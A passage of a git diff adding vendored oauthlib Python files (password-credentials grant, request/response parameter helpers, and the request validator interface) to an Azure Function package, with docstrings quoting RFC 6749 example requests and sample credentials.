failed, %r.', request) + raise errors.InvalidClientError(request=request) + + # Ensure client is authorized use of this grant type + self.validate_grant_type(request) + + # REQUIRED. The refresh token issued to the client. 
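+        # For illustration, the Section 6 refresh request this method
+        # validates looks like the following (RFC 6749's own example values):
+        #
+        #     POST /token HTTP/1.1
+        #     Host: server.example.com
+        #     Authorization: Basic czZCaGRSa3F0MzpnWDFmQmF0M2JW
+        #     Content-Type: application/x-www-form-urlencoded
+        #
+        #     grant_type=refresh_token&refresh_token=tGzv3JOkF0XG5Qx2TlKWIA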
+ log.debug('Validating refresh token %s for client %r.', + request.refresh_token, request.client) + if not self.request_validator.validate_refresh_token( + request.refresh_token, request.client, request): + log.debug('Invalid refresh token, %s, for client %r.', + request.refresh_token, request.client) + raise errors.InvalidGrantError(request=request) + + original_scopes = utils.scope_to_list( + self.request_validator.get_original_scopes( + request.refresh_token, request)) + + if request.scope: + request.scopes = utils.scope_to_list(request.scope) + if (not all(s in original_scopes for s in request.scopes) + and not self.request_validator.is_within_original_scope( + request.scopes, request.refresh_token, request)): + log.debug('Refresh token %s lack requested scopes, %r.', + request.refresh_token, request.scopes) + raise errors.InvalidScopeError(request=request) + else: + request.scopes = original_scopes + + for validator in self.custom_validators.post_token: + validator(request) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/grant_types/resource_owner_password_credentials.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/grant_types/resource_owner_password_credentials.py new file mode 100644 index 0000000..fb38bbd --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/grant_types/resource_owner_password_credentials.py @@ -0,0 +1,199 @@ +""" +oauthlib.oauth2.rfc6749.grant_types +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +""" +import json +import logging + +from .. import errors +from .base import GrantTypeBase + +log = logging.getLogger(__name__) + + +class ResourceOwnerPasswordCredentialsGrant(GrantTypeBase): + + """`Resource Owner Password Credentials Grant`_ + + The resource owner password credentials grant type is suitable in + cases where the resource owner has a trust relationship with the + client, such as the device operating system or a highly privileged + application. The authorization server should take special care when + enabling this grant type and only allow it when other flows are not + viable. + + This grant type is suitable for clients capable of obtaining the + resource owner's credentials (username and password, typically using + an interactive form). It is also used to migrate existing clients + using direct authentication schemes such as HTTP Basic or Digest + authentication to OAuth by converting the stored credentials to an + access token:: + + +----------+ + | Resource | + | Owner | + | | + +----------+ + v + | Resource Owner + (A) Password Credentials + | + v + +---------+ +---------------+ + | |>--(B)---- Resource Owner ------->| | + | | Password Credentials | Authorization | + | Client | | Server | + | |<--(C)---- Access Token ---------<| | + | | (w/ Optional Refresh Token) | | + +---------+ +---------------+ + + Figure 5: Resource Owner Password Credentials Flow + + The flow illustrated in Figure 5 includes the following steps: + + (A) The resource owner provides the client with its username and + password. + + (B) The client requests an access token from the authorization + server's token endpoint by including the credentials received + from the resource owner. When making the request, the client + authenticates with the authorization server. 
+ + (C) The authorization server authenticates the client and validates + the resource owner credentials, and if valid, issues an access + token. + + .. _`Resource Owner Password Credentials Grant`: https://tools.ietf.org/html/rfc6749#section-4.3 + """ + + def create_token_response(self, request, token_handler): + """Return token or error in json format. + + :param request: OAuthlib request. + :type request: oauthlib.common.Request + :param token_handler: A token handler instance, for example of type + oauthlib.oauth2.BearerToken. + + If the access token request is valid and authorized, the + authorization server issues an access token and optional refresh + token as described in `Section 5.1`_. If the request failed client + authentication or is invalid, the authorization server returns an + error response as described in `Section 5.2`_. + + .. _`Section 5.1`: https://tools.ietf.org/html/rfc6749#section-5.1 + .. _`Section 5.2`: https://tools.ietf.org/html/rfc6749#section-5.2 + """ + headers = self._get_default_headers() + try: + if self.request_validator.client_authentication_required(request): + log.debug('Authenticating client, %r.', request) + if not self.request_validator.authenticate_client(request): + log.debug('Client authentication failed, %r.', request) + raise errors.InvalidClientError(request=request) + elif not self.request_validator.authenticate_client_id(request.client_id, request): + log.debug('Client authentication failed, %r.', request) + raise errors.InvalidClientError(request=request) + log.debug('Validating access token request, %r.', request) + self.validate_token_request(request) + except errors.OAuth2Error as e: + log.debug('Client error in token request, %s.', e) + headers.update(e.headers) + return headers, e.json, e.status_code + + token = token_handler.create_token(request, self.refresh_token) + + for modifier in self._token_modifiers: + token = modifier(token) + + self.request_validator.save_token(token, request) + + log.debug('Issuing token %r to client id %r (%r) and username %s.', + token, request.client_id, request.client, request.username) + return headers, json.dumps(token), 200 + + def validate_token_request(self, request): + """ + :param request: OAuthlib request. + :type request: oauthlib.common.Request + + The client makes a request to the token endpoint by adding the + following parameters using the "application/x-www-form-urlencoded" + format per Appendix B with a character encoding of UTF-8 in the HTTP + request entity-body: + + grant_type + REQUIRED. Value MUST be set to "password". + + username + REQUIRED. The resource owner username. + + password + REQUIRED. The resource owner password. + + scope + OPTIONAL. The scope of the access request as described by + `Section 3.3`_. + + If the client type is confidential or the client was issued client + credentials (or assigned other authentication requirements), the + client MUST authenticate with the authorization server as described + in `Section 3.2.1`_. + + The authorization server MUST: + + o require client authentication for confidential clients or for any + client that was issued client credentials (or with other + authentication requirements), + + o authenticate the client if client authentication is included, and + + o validate the resource owner password credentials using its + existing password validation algorithm. 
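+
+        A token request satisfying these requirements looks like the RFC's
+        own `Section 4.3.2`_ example (credentials illustrative):
+
+        .. code-block:: http
+
+            POST /token HTTP/1.1
+            Host: server.example.com
+            Authorization: Basic czZCaGRSa3F0MzpnWDFmQmF0M2JW
+            Content-Type: application/x-www-form-urlencoded
+
+            grant_type=password&username=johndoe&password=A3ddj3w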
+ + Since this access token request utilizes the resource owner's + password, the authorization server MUST protect the endpoint against + brute force attacks (e.g., using rate-limitation or generating + alerts). + + .. _`Section 3.3`: https://tools.ietf.org/html/rfc6749#section-3.3 + .. _`Section 3.2.1`: https://tools.ietf.org/html/rfc6749#section-3.2.1 + """ + for validator in self.custom_validators.pre_token: + validator(request) + + for param in ('grant_type', 'username', 'password'): + if not getattr(request, param, None): + raise errors.InvalidRequestError( + 'Request is missing %s parameter.' % param, request=request) + + for param in ('grant_type', 'username', 'password', 'scope'): + if param in request.duplicate_params: + raise errors.InvalidRequestError(description='Duplicate %s parameter.' % param, request=request) + + # This error should rarely (if ever) occur if requests are routed to + # grant type handlers based on the grant_type parameter. + if not request.grant_type == 'password': + raise errors.UnsupportedGrantTypeError(request=request) + + log.debug('Validating username %s.', request.username) + if not self.request_validator.validate_user(request.username, + request.password, request.client, request): + raise errors.InvalidGrantError( + 'Invalid credentials given.', request=request) + else: + if not hasattr(request.client, 'client_id'): + raise NotImplementedError( + 'Validate user must set the ' + 'request.client.client_id attribute ' + 'in authenticate_client.') + log.debug('Authorizing access to user %r.', request.user) + + # Ensure client is authorized use of this grant type + self.validate_grant_type(request) + + if request.client: + request.client_id = request.client_id or request.client.client_id + self.validate_scopes(request) + + for validator in self.custom_validators.post_token: + validator(request) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/parameters.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/parameters.py new file mode 100644 index 0000000..f0639f0 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/parameters.py @@ -0,0 +1,471 @@ +""" +oauthlib.oauth2.rfc6749.parameters +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +This module contains methods related to `Section 4`_ of the OAuth 2 RFC. + +.. _`Section 4`: https://tools.ietf.org/html/rfc6749#section-4 +""" +import json +import os +import time +import urllib.parse as urlparse + +from oauthlib.common import add_params_to_qs, add_params_to_uri +from oauthlib.signals import scope_changed + +from .errors import ( + InsecureTransportError, MismatchingStateError, MissingCodeError, + MissingTokenError, MissingTokenTypeError, raise_from_error, +) +from .tokens import OAuth2Token +from .utils import is_secure_transport, list_to_scope, scope_to_list + + +def prepare_grant_uri(uri, client_id, response_type, redirect_uri=None, + scope=None, state=None, code_challenge=None, code_challenge_method='plain', **kwargs): + """Prepare the authorization grant request URI. + + The client constructs the request URI by adding the following + parameters to the query component of the authorization endpoint URI + using the ``application/x-www-form-urlencoded`` format as defined by + [`W3C.REC-html401-19991224`_]: + + :param uri: + :param client_id: The client identifier as described in `Section 2.2`_. 
:param response_type: To indicate which OAuth 2 grant/flow is required,
+                          "code" or "token".
+    :param redirect_uri: The client provided URI to redirect back to after
+                         authorization as described in `Section 3.1.2`_.
+    :param scope: The scope of the access request as described by
+                  `Section 3.3`_.
+    :param state: An opaque value used by the client to maintain
+                  state between the request and callback. The authorization
+                  server includes this value when redirecting the user-agent
+                  back to the client. The parameter SHOULD be used for
+                  preventing cross-site request forgery as described in
+                  `Section 10.12`_.
+    :param code_challenge: PKCE parameter. A challenge derived from the
+                           code_verifier that is sent in the authorization
+                           request, to be verified against later.
+    :param code_challenge_method: PKCE parameter. A method that was used to derive the
+                                  code_challenge. Defaults to "plain" if not present in the request.
+    :param kwargs: Extra arguments to embed in the grant/authorization URL.
+
+    An example of an authorization code grant authorization URL:
+
+    .. code-block:: http
+
+        GET /authorize?response_type=code&client_id=s6BhdRkqt3&state=xyz
+            &code_challenge=kjasBS523KdkAILD2k78NdcJSk2k3KHG6&code_challenge_method=S256
+            &redirect_uri=https%3A%2F%2Fclient%2Eexample%2Ecom%2Fcb HTTP/1.1
+        Host: server.example.com
+
+    .. _`W3C.REC-html401-19991224`: https://tools.ietf.org/html/rfc6749#ref-W3C.REC-html401-19991224
+    .. _`Section 2.2`: https://tools.ietf.org/html/rfc6749#section-2.2
+    .. _`Section 3.1.2`: https://tools.ietf.org/html/rfc6749#section-3.1.2
+    .. _`Section 3.3`: https://tools.ietf.org/html/rfc6749#section-3.3
+    .. _`Section 10.12`: https://tools.ietf.org/html/rfc6749#section-10.12
+    """
+    if not is_secure_transport(uri):
+        raise InsecureTransportError()
+
+    params = [(('response_type', response_type)),
+              (('client_id', client_id))]
+
+    if redirect_uri:
+        params.append(('redirect_uri', redirect_uri))
+    if scope:
+        params.append(('scope', list_to_scope(scope)))
+    if state:
+        params.append(('state', state))
+    if code_challenge is not None:
+        params.append(('code_challenge', code_challenge))
+        params.append(('code_challenge_method', code_challenge_method))
+
+    for k in kwargs:
+        if kwargs[k]:
+            params.append((str(k), kwargs[k]))
+
+    return add_params_to_uri(uri, params)
+
+
+def prepare_token_request(grant_type, body='', include_client_id=True, code_verifier=None, **kwargs):
+    """Prepare the access token request.
+
+    The client makes a request to the token endpoint by adding the
+    following parameters using the ``application/x-www-form-urlencoded``
+    format in the HTTP request entity-body:
+
+    :param grant_type: To indicate the grant type being used, i.e. "password",
+                       "authorization_code" or "client_credentials".
+
+    :param body: Existing request body (URL encoded string) to embed parameters
+                 into. This may contain extra parameters. Default ''.
+
+    :param include_client_id: `True` (default) to send the `client_id` in the
+                              body of the upstream request. This is required
+                              if the client is not authenticating with the
+                              authorization server as described in
+                              `Section 3.2.1`_.
+    :type include_client_id: Boolean
+
+    :param client_id: Unicode client identifier. Will only appear if
+                      `include_client_id` is True. *
+
+    :param client_secret: Unicode client secret. Will only appear if set to a
+                          value that is not `None`. Invoking this function with
+                          an empty string will send an empty `client_secret`
+                          value to the server.
* + + :param code: If using authorization_code grant, pass the previously + obtained authorization code as the ``code`` argument. * + + :param redirect_uri: If the "redirect_uri" parameter was included in the + authorization request as described in + `Section 4.1.1`_, and their values MUST be identical. * + + :param code_verifier: PKCE parameter. A cryptographically random string that is used to correlate the + authorization request to the token request. + + :param kwargs: Extra arguments to embed in the request body. + + Parameters marked with a `*` above are not explicit arguments in the + function signature, but are specially documented arguments for items + appearing in the generic `**kwargs` keyworded input. + + An example of an authorization code token request body: + + .. code-block:: http + + grant_type=authorization_code&code=SplxlOBeZQQYbYS6WxSbIA + &redirect_uri=https%3A%2F%2Fclient%2Eexample%2Ecom%2Fcb + + .. _`Section 4.1.1`: https://tools.ietf.org/html/rfc6749#section-4.1.1 + """ + params = [('grant_type', grant_type)] + + if 'scope' in kwargs: + kwargs['scope'] = list_to_scope(kwargs['scope']) + + # pull the `client_id` out of the kwargs. + client_id = kwargs.pop('client_id', None) + if include_client_id: + if client_id is not None: + params.append(('client_id', client_id)) + + # use code_verifier if code_challenge was passed in the authorization request + if code_verifier is not None: + params.append(('code_verifier', code_verifier)) + + # the kwargs iteration below only supports including boolean truth (truthy) + # values, but some servers may require an empty string for `client_secret` + client_secret = kwargs.pop('client_secret', None) + if client_secret is not None: + params.append(('client_secret', client_secret)) + + # this handles: `code`, `redirect_uri`, and other undocumented params + for k in kwargs: + if kwargs[k]: + params.append((str(k), kwargs[k])) + + return add_params_to_qs(body, params) + + +def prepare_token_revocation_request(url, token, token_type_hint="access_token", + callback=None, body='', **kwargs): + """Prepare a token revocation request. + + The client constructs the request by including the following parameters + using the ``application/x-www-form-urlencoded`` format in the HTTP request + entity-body: + + :param token: REQUIRED. The token that the client wants to get revoked. + + :param token_type_hint: OPTIONAL. A hint about the type of the token + submitted for revocation. Clients MAY pass this + parameter in order to help the authorization server + to optimize the token lookup. If the server is + unable to locate the token using the given hint, it + MUST extend its search across all of its supported + token types. An authorization server MAY ignore + this parameter, particularly if it is able to detect + the token type automatically. + + This specification defines two values for `token_type_hint`: + + * access_token: An access token as defined in [RFC6749], + `Section 1.4`_ + + * refresh_token: A refresh token as defined in [RFC6749], + `Section 1.5`_ + + Specific implementations, profiles, and extensions of this + specification MAY define other values for this parameter using the + registry defined in `Section 4.1.2`_. + + .. _`Section 1.4`: https://tools.ietf.org/html/rfc6749#section-1.4 + .. _`Section 1.5`: https://tools.ietf.org/html/rfc6749#section-1.5 + .. 
_`Section 4.1.2`: https://tools.ietf.org/html/rfc7009#section-4.1.2 + + """ + if not is_secure_transport(url): + raise InsecureTransportError() + + params = [('token', token)] + + if token_type_hint: + params.append(('token_type_hint', token_type_hint)) + + for k in kwargs: + if kwargs[k]: + params.append((str(k), kwargs[k])) + + headers = {'Content-Type': 'application/x-www-form-urlencoded'} + + if callback: + params.append(('callback', callback)) + return add_params_to_uri(url, params), headers, body + else: + return url, headers, add_params_to_qs(body, params) + + +def parse_authorization_code_response(uri, state=None): + """Parse authorization grant response URI into a dict. + + If the resource owner grants the access request, the authorization + server issues an authorization code and delivers it to the client by + adding the following parameters to the query component of the + redirection URI using the ``application/x-www-form-urlencoded`` format: + + **code** + REQUIRED. The authorization code generated by the + authorization server. The authorization code MUST expire + shortly after it is issued to mitigate the risk of leaks. A + maximum authorization code lifetime of 10 minutes is + RECOMMENDED. The client MUST NOT use the authorization code + more than once. If an authorization code is used more than + once, the authorization server MUST deny the request and SHOULD + revoke (when possible) all tokens previously issued based on + that authorization code. The authorization code is bound to + the client identifier and redirection URI. + + **state** + REQUIRED if the "state" parameter was present in the client + authorization request. The exact value received from the + client. + + :param uri: The full redirect URL back to the client. + :param state: The state parameter from the authorization request. + + For example, the authorization server redirects the user-agent by + sending the following HTTP response: + + .. code-block:: http + + HTTP/1.1 302 Found + Location: https://client.example.com/cb?code=SplxlOBeZQQYbYS6WxSbIA + &state=xyz + + """ + if not is_secure_transport(uri): + raise InsecureTransportError() + + query = urlparse.urlparse(uri).query + params = dict(urlparse.parse_qsl(query)) + + if state and params.get('state', None) != state: + raise MismatchingStateError() + + if 'error' in params: + raise_from_error(params.get('error'), params) + + if not 'code' in params: + raise MissingCodeError("Missing code parameter in response.") + + return params + + +def parse_implicit_response(uri, state=None, scope=None): + """Parse the implicit token response URI into a dict. + + If the resource owner grants the access request, the authorization + server issues an access token and delivers it to the client by adding + the following parameters to the fragment component of the redirection + URI using the ``application/x-www-form-urlencoded`` format: + + **access_token** + REQUIRED. The access token issued by the authorization server. + + **token_type** + REQUIRED. The type of the token issued as described in + Section 7.1. Value is case insensitive. + + **expires_in** + RECOMMENDED. The lifetime in seconds of the access token. For + example, the value "3600" denotes that the access token will + expire in one hour from the time the response was generated. + If omitted, the authorization server SHOULD provide the + expiration time via other means or document the default value. + + **scope** + OPTIONAL, if identical to the scope requested by the client, + otherwise REQUIRED. 
The scope of the access token as described + by Section 3.3. + + **state** + REQUIRED if the "state" parameter was present in the client + authorization request. The exact value received from the + client. + + :param uri: + :param state: + :param scope: + + Similar to the authorization code response, but with a full token provided + in the URL fragment: + + .. code-block:: http + + HTTP/1.1 302 Found + Location: http://example.com/cb#access_token=2YotnFZFEjr1zCsicMWpAA + &state=xyz&token_type=example&expires_in=3600 + """ + if not is_secure_transport(uri): + raise InsecureTransportError() + + fragment = urlparse.urlparse(uri).fragment + params = dict(urlparse.parse_qsl(fragment, keep_blank_values=True)) + + for key in ('expires_in',): + if key in params: # cast things to int + params[key] = int(params[key]) + + if 'scope' in params: + params['scope'] = scope_to_list(params['scope']) + + if 'expires_in' in params: + params['expires_at'] = time.time() + int(params['expires_in']) + + if state and params.get('state', None) != state: + raise ValueError("Mismatching or missing state in params.") + + params = OAuth2Token(params, old_scope=scope) + validate_token_parameters(params) + return params + + +def parse_token_response(body, scope=None): + """Parse the JSON token response body into a dict. + + The authorization server issues an access token and optional refresh + token, and constructs the response by adding the following parameters + to the entity body of the HTTP response with a 200 (OK) status code: + + access_token + REQUIRED. The access token issued by the authorization server. + token_type + REQUIRED. The type of the token issued as described in + `Section 7.1`_. Value is case insensitive. + expires_in + RECOMMENDED. The lifetime in seconds of the access token. For + example, the value "3600" denotes that the access token will + expire in one hour from the time the response was generated. + If omitted, the authorization server SHOULD provide the + expiration time via other means or document the default value. + refresh_token + OPTIONAL. The refresh token which can be used to obtain new + access tokens using the same authorization grant as described + in `Section 6`_. + scope + OPTIONAL, if identical to the scope requested by the client, + otherwise REQUIRED. The scope of the access token as described + by `Section 3.3`_. + + The parameters are included in the entity body of the HTTP response + using the "application/json" media type as defined by [`RFC4627`_]. The + parameters are serialized into a JSON structure by adding each + parameter at the highest structure level. Parameter names and string + values are included as JSON strings. Numerical values are included + as JSON numbers. The order of parameters does not matter and can + vary. + + :param body: The full json encoded response body. + :param scope: The scope requested during authorization. + + For example: + + .. code-block:: http + + HTTP/1.1 200 OK + Content-Type: application/json + Cache-Control: no-store + Pragma: no-cache + + { + "access_token":"2YotnFZFEjr1zCsicMWpAA", + "token_type":"example", + "expires_in":3600, + "refresh_token":"tGzv3JOkF0XG5Qx2TlKWIA", + "example_parameter":"example_value" + } + + .. _`Section 7.1`: https://tools.ietf.org/html/rfc6749#section-7.1 + .. _`Section 6`: https://tools.ietf.org/html/rfc6749#section-6 + .. _`Section 3.3`: https://tools.ietf.org/html/rfc6749#section-3.3 + .. 
_`RFC4627`: https://tools.ietf.org/html/rfc4627 + """ + try: + params = json.loads(body) + except ValueError: + + # Fall back to URL-encoded string, to support old implementations, + # including (at time of writing) Facebook. See: + # https://github.com/oauthlib/oauthlib/issues/267 + + params = dict(urlparse.parse_qsl(body)) + for key in ('expires_in',): + if key in params: # cast things to int + params[key] = int(params[key]) + + if 'scope' in params: + params['scope'] = scope_to_list(params['scope']) + + if 'expires_in' in params: + if params['expires_in'] is None: + params.pop('expires_in') + else: + params['expires_at'] = time.time() + int(params['expires_in']) + + params = OAuth2Token(params, old_scope=scope) + validate_token_parameters(params) + return params + + +def validate_token_parameters(params): + """Ensures token presence, token type, expiration and scope in params.""" + if 'error' in params: + raise_from_error(params.get('error'), params) + + if not 'access_token' in params: + raise MissingTokenError(description="Missing access token parameter.") + + if not 'token_type' in params: + if os.environ.get('OAUTHLIB_STRICT_TOKEN_TYPE'): + raise MissingTokenTypeError() + + # If the issued access token scope is different from the one requested by + # the client, the authorization server MUST include the "scope" response + # parameter to inform the client of the actual scope granted. + # https://tools.ietf.org/html/rfc6749#section-3.3 + if params.scope_changed: + message = 'Scope has changed from "{old}" to "{new}".'.format( + old=params.old_scope, new=params.scope, + ) + scope_changed.send(message=message, old=params.old_scopes, new=params.scopes) + if not os.environ.get('OAUTHLIB_RELAX_TOKEN_SCOPE', None): + w = Warning(message) + w.token = params + w.old_scope = params.old_scopes + w.new_scope = params.scopes + raise w diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/request_validator.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/request_validator.py new file mode 100644 index 0000000..71f9707 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/request_validator.py @@ -0,0 +1,676 @@ +""" +oauthlib.oauth2.rfc6749.request_validator +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +""" +import logging + +log = logging.getLogger(__name__) + + +class RequestValidator: + + def client_authentication_required(self, request, *args, **kwargs): + """Determine if client authentication is required for current request. + + According to the rfc6749, client authentication is required in the following cases: + - Resource Owner Password Credentials Grant, when Client type is Confidential or when + Client was issued client credentials or whenever Client provided client + authentication, see `Section 4.3.2`_. + - Authorization Code Grant, when Client type is Confidential or when Client was issued + client credentials or whenever Client provided client authentication, + see `Section 4.1.3`_. + - Refresh Token Grant, when Client type is Confidential or when Client was issued + client credentials or whenever Client provided client authentication, see + `Section 6`_ + + :param request: OAuthlib request. + :type request: oauthlib.common.Request + :rtype: True or False + + Method is used by: + - Authorization Code Grant + - Resource Owner Password Credentials Grant + - Refresh Token Grant + + .. 
_`Section 4.3.2`: https://tools.ietf.org/html/rfc6749#section-4.3.2
+        .. _`Section 4.1.3`: https://tools.ietf.org/html/rfc6749#section-4.1.3
+        .. _`Section 6`: https://tools.ietf.org/html/rfc6749#section-6
+        """
+        return True
+
+    def authenticate_client(self, request, *args, **kwargs):
+        """Authenticate client through means outside the OAuth 2 spec.
+
+        The means of authentication is negotiated beforehand and may for
+        example be the `HTTP Basic Authentication Scheme`_, which utilizes
+        the Authorization header.
+
+        Headers may be accessed through request.headers, and parameters found
+        in both body and query can be obtained by direct attribute access, i.e.
+        request.client_id for client_id in the URL query.
+
+        The authentication process is required to contain the identification of
+        the client (i.e. search the database based on the client_id). In case the
+        client doesn't exist based on the received client_id, this method has to
+        return False and the HTTP response created by the library will contain an
+        'invalid_client' message.
+
+        After the client identification succeeds, this method needs to set the
+        client on the request, i.e. request.client = client. A client object's
+        class must contain the 'client_id' attribute and the 'client_id' must have
+        a value.
+
+        :param request: OAuthlib request.
+        :type request: oauthlib.common.Request
+        :rtype: True or False
+
+        Method is used by:
+            - Authorization Code Grant
+            - Resource Owner Password Credentials Grant (may be disabled)
+            - Client Credentials Grant
+            - Refresh Token Grant
+
+        .. _`HTTP Basic Authentication Scheme`: https://tools.ietf.org/html/rfc1945#section-11.1
+        """
+        raise NotImplementedError('Subclasses must implement this method.')
+
+    def authenticate_client_id(self, client_id, request, *args, **kwargs):
+        """Ensure client_id belongs to a non-confidential client.
+
+        A non-confidential client is one that is not required to authenticate
+        through other means, such as using HTTP Basic.
+
+        Note, while not strictly necessary it can often be very convenient
+        to set request.client to the client object associated with the
+        given client_id.
+
+        :param client_id: Unicode client identifier.
+        :param request: OAuthlib request.
+        :type request: oauthlib.common.Request
+        :rtype: True or False
+
+        Method is used by:
+            - Authorization Code Grant
+        """
+        raise NotImplementedError('Subclasses must implement this method.')
+
+    def confirm_redirect_uri(self, client_id, code, redirect_uri, client, request,
+                             *args, **kwargs):
+        """Ensure that the authorization process represented by this authorization
+        code began with this 'redirect_uri'.
+
+        If the client specifies a redirect_uri when obtaining code then that
+        redirect URI must be bound to the code and verified equal in this
+        method, according to RFC 6749 section 4.1.3. Do not compare against
+        the client's allowed redirect URIs, but against the URI used when the
+        code was saved.
+
+        :param client_id: Unicode client identifier.
+        :param code: Unicode authorization_code.
+        :param redirect_uri: Unicode absolute URI.
+        :param client: Client object set by you, see ``.authenticate_client``.
+        :param request: OAuthlib request.
+        :type request: oauthlib.common.Request
+        :rtype: True or False
+
+        Method is used by:
+            - Authorization Code Grant (during token request)
+        """
+        raise NotImplementedError('Subclasses must implement this method.')
+
+    def get_default_redirect_uri(self, client_id, request, *args, **kwargs):
+        """Get the default redirect URI for the client.
+
+        :param client_id: Unicode client identifier.
+        :param request: OAuthlib request.
+        :type request: oauthlib.common.Request
+        :rtype: The default redirect URI for the client
+
+        Method is used by:
+            - Authorization Code Grant
+            - Implicit Grant
+        """
+        raise NotImplementedError('Subclasses must implement this method.')
+
+    def get_default_scopes(self, client_id, request, *args, **kwargs):
+        """Get the default scopes for the client.
+
+        :param client_id: Unicode client identifier.
+        :param request: OAuthlib request.
+        :type request: oauthlib.common.Request
+        :rtype: List of default scopes
+
+        Method is used by all core grant types:
+            - Authorization Code Grant
+            - Implicit Grant
+            - Resource Owner Password Credentials Grant
+            - Client Credentials grant
+        """
+        raise NotImplementedError('Subclasses must implement this method.')
+
+    def get_original_scopes(self, refresh_token, request, *args, **kwargs):
+        """Get the list of scopes associated with the refresh token.
+
+        :param refresh_token: Unicode refresh token.
+        :param request: OAuthlib request.
+        :type request: oauthlib.common.Request
+        :rtype: List of scopes.
+
+        Method is used by:
+            - Refresh token grant
+        """
+        raise NotImplementedError('Subclasses must implement this method.')
+
+    def is_within_original_scope(self, request_scopes, refresh_token, request, *args, **kwargs):
+        """Check if requested scopes are within a scope of the refresh token.
+
+        When access tokens are refreshed the scope of the new token
+        needs to be within the scope of the original token. This is
+        ensured by checking that all requested scope strings are on
+        the list returned by get_original_scopes. If this check
+        fails, is_within_original_scope is called. The method can be
+        used in situations where returning all valid scopes from the
+        get_original_scopes is not practical.
+
+        :param request_scopes: A list of scopes that were requested by the client.
+        :param refresh_token: Unicode refresh_token.
+        :param request: OAuthlib request.
+        :type request: oauthlib.common.Request
+        :rtype: True or False
+
+        Method is used by:
+            - Refresh token grant
+        """
+        return False
+
+    def introspect_token(self, token, token_type_hint, request, *args, **kwargs):
+        """Introspect an access or refresh token.
+
+        Called once the introspect request is validated. This method should
+        verify the *token* and either return a dictionary with the list of
+        claims associated, or `None` in case the token is unknown.
+
+        Below is the list of registered claims you should be interested in:
+
+        - scope : space-separated list of scopes
+        - client_id : client identifier
+        - username : human-readable identifier for the resource owner
+        - token_type : type of the token
+        - exp : integer timestamp indicating when this token will expire
+        - iat : integer timestamp indicating when this token was issued
+        - nbf : integer timestamp indicating when it can be "not-before" used
+        - sub : subject of the token - identifier of the resource owner
+        - aud : list of string identifiers representing the intended audience
+        - iss : string representing issuer of this token
+        - jti : string identifier for the token
+
+        Note that most of them are coming directly from the JWT RFC. More details
+        can be found in `Introspect Claims`_ or `JWT Claims`_.
+
+        The implementation can use *token_type_hint* to improve lookup
+        efficiency, but must fall back to other types to be compliant with the RFC.
+
+        The dict of claims is added to request.token after this method.
+
+        :param token: The token string.
+        :param token_type_hint: access_token or refresh_token.
+        :param request: OAuthlib request.
+        :type request: oauthlib.common.Request
+
+        Method is used by:
+            - Introspect Endpoint (all grants are compatible)
+
+        .. _`Introspect Claims`: https://tools.ietf.org/html/rfc7662#section-2.2
+        .. _`JWT Claims`: https://tools.ietf.org/html/rfc7519#section-4
+        """
+        raise NotImplementedError('Subclasses must implement this method.')
+
+    def invalidate_authorization_code(self, client_id, code, request, *args, **kwargs):
+        """Invalidate an authorization code after use.
+
+        :param client_id: Unicode client identifier.
+        :param code: The authorization code grant (request.code).
+        :param request: OAuthlib request.
+        :type request: oauthlib.common.Request
+
+        Method is used by:
+            - Authorization Code Grant
+        """
+        raise NotImplementedError('Subclasses must implement this method.')
+
+    def revoke_token(self, token, token_type_hint, request, *args, **kwargs):
+        """Revoke an access or refresh token.
+
+        :param token: The token string.
+        :param token_type_hint: access_token or refresh_token.
+        :param request: OAuthlib request.
+        :type request: oauthlib.common.Request
+
+        Method is used by:
+            - Revocation Endpoint
+        """
+        raise NotImplementedError('Subclasses must implement this method.')
+
+    def rotate_refresh_token(self, request):
+        """Determine whether to rotate the refresh token. Default, yes.
+
+        When access tokens are refreshed the old refresh token can be kept
+        or replaced with a new one (rotated). Return True to rotate and
+        False to keep the original.
+
+        :param request: OAuthlib request.
+        :type request: oauthlib.common.Request
+        :rtype: True or False
+
+        Method is used by:
+            - Refresh Token Grant
+        """
+        return True
+
+    def save_authorization_code(self, client_id, code, request, *args, **kwargs):
+        """Persist the authorization_code.
+
+        The code should at minimum be stored with:
+            - the client_id (``client_id``)
+            - the redirect URI used (``request.redirect_uri``)
+            - a resource owner / user (``request.user``)
+            - the authorized scopes (``request.scopes``)
+
+        To support PKCE, you MUST associate the code with:
+            - Code Challenge (``request.code_challenge``) and
+            - Code Challenge Method (``request.code_challenge_method``)
+
+        To support OIDC, you MUST associate the code with:
+            - nonce, if present (``code["nonce"]``)
+
+        The ``code`` argument is actually a dictionary, containing at least a
+        ``code`` key with the actual authorization code:
+
+            ``{'code': 'sdf345jsdf0934f'}``
+
+        It may also have a ``claims`` parameter which, when present, will be a dict
+        deserialized from JSON as described at
+        http://openid.net/specs/openid-connect-core-1_0.html#ClaimsParameter
+        This value should be saved in this method and used again in ``.validate_code``.
+
+        :param client_id: Unicode client identifier.
+        :param code: A dict of the authorization code grant and, optionally, state.
+        :param request: OAuthlib request.
+        :type request: oauthlib.common.Request
+
+        Method is used by:
+            - Authorization Code Grant
+        """
+        raise NotImplementedError('Subclasses must implement this method.')
+
+    def save_token(self, token, request, *args, **kwargs):
+        """Persist the token with a token type specific method.
+
+        Currently, only save_bearer_token is supported.
+
+        :param token: A (Bearer) token dict.
+        :param request: OAuthlib request.
+        :type request: oauthlib.common.Request
+        """
+        return self.save_bearer_token(token, request, *args, **kwargs)
+
+    def save_bearer_token(self, token, request, *args, **kwargs):
+        """Persist the Bearer token.
+
+        The Bearer token should at minimum be associated with:
+            - a client and its client_id, if available
+            - a resource owner / user (request.user)
